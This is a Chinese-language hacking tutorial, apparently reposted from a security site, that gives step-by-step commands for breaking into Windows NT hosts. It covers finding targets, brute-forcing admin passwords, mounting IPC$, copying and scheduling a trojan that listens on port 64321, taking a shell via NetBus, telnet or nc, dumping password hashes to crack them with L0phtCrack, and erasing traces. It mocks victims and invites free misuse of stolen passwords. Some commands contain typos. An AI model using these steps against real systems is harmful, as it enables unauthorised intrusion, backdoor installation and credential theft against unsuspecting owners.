1 本方法要有以下几个工具：PINGER；LETMEIN；NTSRV；NETSVC；PWDDUMP；NC；L0PHTCRACK
　　2 开始，用PINGER查一个IP段，找到目标，并选定
　　
　　3 进入DOS，利用LETMEIN
　　
　　C：\>LETMEIN \\IP -ADMIN -D MYPWD
　　
　　探测该网站的USER和PASSWD,如没有,试其它网站,你总会找到几个笨蛋的,我们这里以USER=KAWE PASSWD=KAWEN为准
　　
　　4 进入IPC连接
　　
　　C:\>NET USE \\IP\IPC$ :KAWEN" /USER:"KAWEN"
　　
　　5 进去后,COPY工具进去 NTSRV;NETSVC;PWDDUMP
　　
　　方法:COPY C:\HACK2\NTSRV.EXE \\IP\ADMIN$\SYSTEM32
　　
　　6 启动木马程序(NESRV.EXE)并监听64321端口.
　　
　　C:\>NETSVC \\IP SCHEDULE /START (启动SCHEDULE)
　　
　　C:\>AT \\IP 13:00 NTSRV.EXE /PORT:64321 |NOMSG
　　
　　(SCHEDULE启动NTSRV.EXE并监听64321)
　　
　　7.成功.启动木马客户端(NETBUS)在HOSTNAME/IP中填入IP,在PORT中填入64321,选CONNECT.
　　
　　8选项GETINFO 会反回一个消息,可以看到NT在对方的C盘中的WINNT
　　
　　9 选APPREDIRECT,我们要利用它的CMD.EXE,弹出的窗口填入
　　
　　C:\>C:\WINNT\SYSTEM32\CMD.EXE
　　
　　PORT:64321
　　
　　10 我们可以利用TELNET和NC二种方式来控制
　　
　　TELNET IP 64321
　　
　　NC IP 64321
　　
　　并用NET VIEW看共享
　　
　　11 在TELNET或 NC方式中运行PWDDUMP.EXE,利用NETBUS将SERVER.LC拉下来,并用L0PHTCRACK来解密
　　
　　C:\>WINNT>SYSTEM32>PWDDUMMP >SERVER.LC 用L0PHTCRACK解密码
　　
　　12 得到PASSWD做什么随便你,别忘了X掉你上传到他机子上的FILE.
　　

文章转载地址：http://www.cnpaf.net/Class/hack/06101110491746390295.html